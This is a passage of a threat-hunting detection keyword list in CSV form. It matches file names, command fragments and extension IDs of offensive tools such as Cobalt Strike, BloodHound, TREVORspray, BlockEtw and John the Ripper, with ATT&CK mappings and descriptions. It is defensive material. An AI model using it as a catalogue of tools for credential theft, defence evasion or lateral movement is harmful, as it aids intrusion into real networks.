T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*bkkgdjpomdnfemhhkalfkogckjdkcjkg*,greyware_tool_keyword,VPNMatic,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bks2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*blackarrowsec/mssqlproxy*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*blackarrowsec/pivotnacci*,offensive_tool_keyword,pivotnacci,A tool to make socks connections through HTTP agents,T1090 - T1090.003,TA0003 - TA0011,N/A,N/A,C2 - Persistence,https://github.com/blackarrowsec/pivotnacci,1,1,N/A,9,10,614,111,2021-03-30T14:37:25Z,2020-04-28T11:36:45Z -*blackhat-arsenal-tools*,offensive_tool_keyword,Github Username,This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/toolswatch/blackhat-arsenal-tools,1,0,N/A,N/A,10,3545,1140,2023-08-14T03:46:11Z,2017-07-21T08:03:44Z -*blacklanternsecurity/MANSPIDER*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*blacklanternsecurity/trevorproxy*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*blacklanternsecurity/TREVORspray*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*Blackout.exe *,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,0,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*ble_recon.go*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*blendin/3snake*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*blindSQLPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*blockchain2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*blockdlls -*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*blockdlls start*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*blockdlls stop*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*blocketw.bin*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.csproj*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.exe*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.pdb*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*BlockEtw-master*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*BlockOpenHandle.cpp*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle.exe*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle.vcxproj*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle-main*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*bloginuser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*blogonpasswords*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bloodhound &> /dev/null &*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bloodhound --no-sandbox*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound-*.zip*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*bloodhound.ad.*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.bin*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*bloodhound.enumeration*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bloodhound.py *,offensive_tool_keyword,BloodHound.py,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.py*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bloodhound_output*/dev/null*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bloodhound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bloodhound_output_dconly_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*BloodHoundAD*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*BloodHoundAD*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*BloodHoundGraphToGoFetchPath*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*bloodhound-import -du neo4j -dp *.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*BloodHound-master*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound-modified.ps1*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*bloodhound-python*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound-quickwin -u * -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bloodhound-quickwin-main*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*bloodyAD -*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,0,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bloodyAD.py*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bloodyAD-main*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bluekeepscanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*bm90cmVkYW1lY2hlYXRzdG93aW4-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*bniikohfmajhdcffljgfeiklcbgffppl*,greyware_tool_keyword,Upnet,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bnijmipndnicefcdbhgcjoognndbgkep*,greyware_tool_keyword,Veee,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bob@moozle.wtf*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*BOF prototype works!*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode 